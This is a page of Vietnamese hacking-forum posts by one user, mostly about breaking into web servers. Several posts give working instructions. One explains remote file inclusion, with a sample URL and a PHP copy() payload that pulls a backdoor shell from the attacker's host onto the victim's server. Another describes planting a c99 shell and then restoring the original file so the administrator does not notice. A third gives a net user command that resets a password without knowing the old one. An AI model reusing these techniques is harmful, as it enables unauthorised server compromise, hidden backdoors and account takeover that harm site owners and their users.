English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Messages posted by: gamma95  XML
Profile for gamma95 Messages posted by gamma95 [ number of posts not being displayed on this page: 14 ]
 
Thảo luận thâm nhập  Empty  Go to message
Code:
Ai biểu em nghe lời lão Lúc Lắc làm wé gì cơ chứ hix , cái lão này toàn lừa trẻ con không hà, toàn làm rối rắm vấn đề ra
Có 2 phương pháp nhanh ở việc này :
Change source của 1 file -> source con c99 đỡ phải copy(), (trước đó save cái file mình định change đã) có shell trên host rồi, up file mới là shell xịn của mình, dùng shell xịn change lại file cũ cho thèng admin 0 nghi ngờ
Cách 2 dùng hàm include shell (xem chi tiết bên vniss keke)

hô hô ... bạn dch nói chiện nghe huề vốn wá ,vniss ngoài cái trò local ra còn cái fVck gì đâu mà múa lửa ,đi đâu cũng vờnit ,vờnit !
ps:điều cần làm nhất bây giờ là giáo dục cho tụi nhỏ lòng tự trọng !
Thảo luận bảo mật  Empty  Go to message
thôi ..wải rồi ,giải tán vũ trừờng
Thảo luận bảo mật  Empty  Go to message
ối giời ...em để file txt.php trong D:\ mà php localhost em cài ở ổ C hèn chi nó đọc được file php smilie ..còn tại sao àh ... cái này giải thích cũng khó đấy ..
khớ khớ
ps:nếu nhocbmt vẫn chưa hiểu thì có 1 VD gây shock đây ... nếu suy nghĩ của em đúng thì em có thể đọc bất cứ source php của bất cứ site nào ...= cách em dùng readfile như em nói smilie
Thảo luận thâm nhập  Empty  Go to message
khổ wá ,copy làm 1 hàm của của PHP chứ không phải của *nix
đại loại là nếu 1 ứng dụng nào đó bị remote file include mà việc bạn include backdoor vào ko upload đc gì lên host victim ,thì bạn hãy include 1 file chứa hàm copy để copy con backdoor trên host của bạn về host của victim,tất nhiên folder của victim phải có quyền ghi
vd
http://site.com/index.php?file=http://host ko support php/hihi.php
nội dung file hihi.php
<?
copy("http://hostkosupportphp/remview.php","aboutme.php");
?>
lúc đó trên host của victim sẽ có con aboutme.php chính là con remview của chúng ta
căn bản là như thế
Thảo luận thâm nhập  Empty  Go to message
nhócbmt đọc kĩ lại bài reply của luke ... "dùng hàm copy"
Thảo luận bảo mật  Empty  Go to message
nội dung txt.php là nội dung file config thực sự mà ứng dụng đang dùng !

Tại sao lại là php àh chắc tại vì browser ko thể view được php nên dùng php !

Tất nhiên .dll hoặc .txt . gì cũng được ! Nhưng có vẻ ko an toàn
 

hehe ...như vậy là cái host khác của bạn support php
vậy thì như bạn onlyAnh đã nói ...
Code:
$f="host khác.com/txt.php"
$read=readfile($f);

hàm readfile lúc đó chỉ đọc đã mã HTML trả về của file txt.php thôi ,cái này nhócbmt sai cơ bản

Thảo luận thâm nhập  Empty  Go to message
lão luke thông cảm ,hồi lão local thì tụi nhỏ chưa bit bắn bi ... nên nhiều khi nghe chúng thảo luận cũng bực mình lém smilie)
Thảo luận bảo mật  Empty  Go to message
file config của em :
<?
$f="host khác.com/txt.php"
$read=readfile($f);
?>
 

xin cho bit nội dung file txt.php
tại sao phải là *.php ? ..cái host khác có hỗ trợ PHP ko ??
Thảo luận thâm nhập  Empty  Go to message

kilua_vniss wrote:
trong linux thi` dung` pwd con` win thi` em cha? bit'
ps:quai' sao em ko type duoc tieng viet nhi  

thua smilie
Thảo luận thâm nhập  Empty  Go to message
thì em post lên đi
Thảo luận thâm nhập  Empty  Go to message
Dùng lệnh dir anh ạ.
vd: ta thấy file a.txt ở thu mục hiện thời  

thấy ở thư mục hiện thời thì bit đường dẫn rồi ... còn dir làm gì ?? đọc kĩ đề bài smilie
Thảo luận thâm nhập  Empty  Go to message
hếlô lão thắngbố smilie !
cho tui hỏi phát :muốn tìm đường dẫn 1 file dùng cmd là lệnh gì nhỉ ?
Thảo luận hệ điều hành Windows  Empty  Go to message
bổ sung cho command net user
reset password current user ko cần bit pass cũ
net user %username% newpass
 
Go to Page:  First Page Page 42 43 44 45

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|